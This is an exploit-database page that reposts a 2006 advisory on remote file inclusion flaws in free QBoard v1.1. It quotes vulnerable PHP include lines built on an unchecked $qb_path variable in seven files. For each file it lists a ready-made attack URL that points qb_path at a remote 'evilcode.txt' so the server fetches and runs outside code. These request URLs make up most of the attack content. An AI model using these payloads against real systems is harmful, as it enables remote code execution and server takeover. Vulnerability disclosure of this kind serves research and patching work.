Advertisement






free QBoard v1.1 Multiple Remote File include

CVE Category Price Severity
CWE-Other N/A Medium
Author Risk Exploitation Type Date
Unknown High Remote 2006-07-25
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 0 0

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006070007

Below is a copy:

free QBoard  v1.1 Multiple Remote File include

-------------------------------------------------

Discovered By CrAsh_oVeR_rIdE

Arabian Security Team

-------------------------------------------------

site of script:http://sourceforge.net/projects/freeqboard/

-------------------------------------------------

Vulnerable: free QBoard  v1.1

-------------------------------------------------

vulnerable code:

----------------------

1- in index.php

include $qb_path."incs/mysql.php";

include $qb_path."incs/crypt.php";

----------------------------------

2- in about.php

include $qb_path."incs/header.php";

----------------------------------

3- in contact.php

include $qb_path."incs/header.php";

----------------------------------

4- in delete.php

include $qb_path."incs/mysql.php";

include $qb_path."incs/crypt.php";

----------------------------------

5- in faq.php

include $qb_path."incs/header.php";

----------------------------------

6- in features.php

include $qb_path."incs/header.php";

----------------------------------

7- in history.php

include $qb_path."incs/mysql.php";

include $qb_path."incs/crypt.php";

----------

$qb_path parameter File inclusion

------------------------------------------------------------------------
-----------------------------------------------------------------

vulnerable files  :

--------------------

index.php

about.php

contact.php

delete.php

faq.php

features.php

history.php

-------------------------------------------------

example:

www.example.com/(path)/index.php?qb_path=http://evilcode.txt?

www.example.com/(path)/about.php?qb_path=http://evilcode.txt?

www.example.com/(path)/contact.php?qb_path=http://evilcode.txt?

www.example.com/(path)/delete.php?qb_path=http://evilcode.txt?

www.example.com/(path)/faq.php?qb_path=http://evilcode.txt?

www.example.com/(path)/features.php?qb_path=http://evilcode.txt?

www.example.com/(path)/history.php?qb_path=http://evilcode.txt?

-------------------------------------------------

Discovered By CrAsh_oVeR_rIdE

E-mail:KARKOR23 (at) hotmail (dot) com [email concealed]

Site:www.lezr.com

Greetz:KING-HACKER,YOUNG HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALM
OKAN3, mr-hcr AND ALL LEZR.COM Member

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum